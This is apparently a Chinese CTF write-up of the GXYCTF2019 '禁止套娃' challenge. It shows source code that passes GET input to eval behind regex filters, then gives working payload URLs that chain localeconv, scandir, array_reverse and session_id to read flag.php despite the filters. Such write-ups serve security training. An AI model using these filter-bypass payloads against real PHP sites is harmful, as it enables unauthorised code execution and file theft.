[GXYCTF2019]禁止套娃 无回显 RCE 过滤__FILE__ dirname等

扫除git

通过githack

获取index.php

复制代码
<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>

发现是命令执行 并且存在过滤

我们之前使用的 print_r(dirname(FILE));

在这里不可以使用

1.localeconv()

直接上payload了

复制代码
print_r(localeconv());

通过current指定第一个 .

复制代码
?exp=print_r(current(localeconv()));

这样我们配合 scandir 就可以实现 scandir('.')了

复制代码
?exp=print_r(scandir(current(localeconv())));

这里我们无法使用[] 所以我们可以通过 array_reverse 倒序数组 然后next即可

复制代码
?exp=print_r(next(array_reverse(scandir(current(localeconv())))));
复制代码
/?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));

2.seesion_id

正常情况下 不开启 seesion 服务 但是如果我们可以通过 seesion_start()开启

我们就可以通过 seesion传递值

复制代码
?exp=print_r(session_id(session_start()))


bp中加

Cookie: PHPSESSID=flag.php

然后一样通过 highlight_file即可

相关推荐
用户92724725021910 小时前
PHP+JS+CSS+JSON 单页新闻系统实现方案
php
Ashlee_code12 小时前
什么是Web3?金融解决方案
开发语言·金融·架构·eclipse·web3·区块链·php
Sally璐璐17 小时前
IPSAN 共享存储详解:架构、优化与落地实践指南
开发语言·php
程序猿阿伟19 小时前
《声音的变形记:Web Audio API的实时特效法则》
开发语言·前端·php
Clownseven20 小时前
Shell 脚本实战指南:内网 ARP 洪泛监控与飞书/邮件自动告警
网络·php·飞书
浪裡遊1 天前
React Hooks全面解析:从基础到高级的实用指南
开发语言·前端·javascript·react.js·node.js·ecmascript·php
ejinxian2 天前
PHP 超文本预处理器 发布 8.5 版本
开发语言·php
zorro_z2 天前
PHP语法基础篇(九):正则表达式
php
高压锅_12202 天前
思科与华为网络设备命令对比指南:从基础操作到高级配置
服务器·华为·php
SuperherRo2 天前
WEB攻防-文件包含&LFI&RFI&伪协议编码算法&无文件利用&黑白盒
php·文件包含·伪协议·lfi·无文件·黑白盒·rfi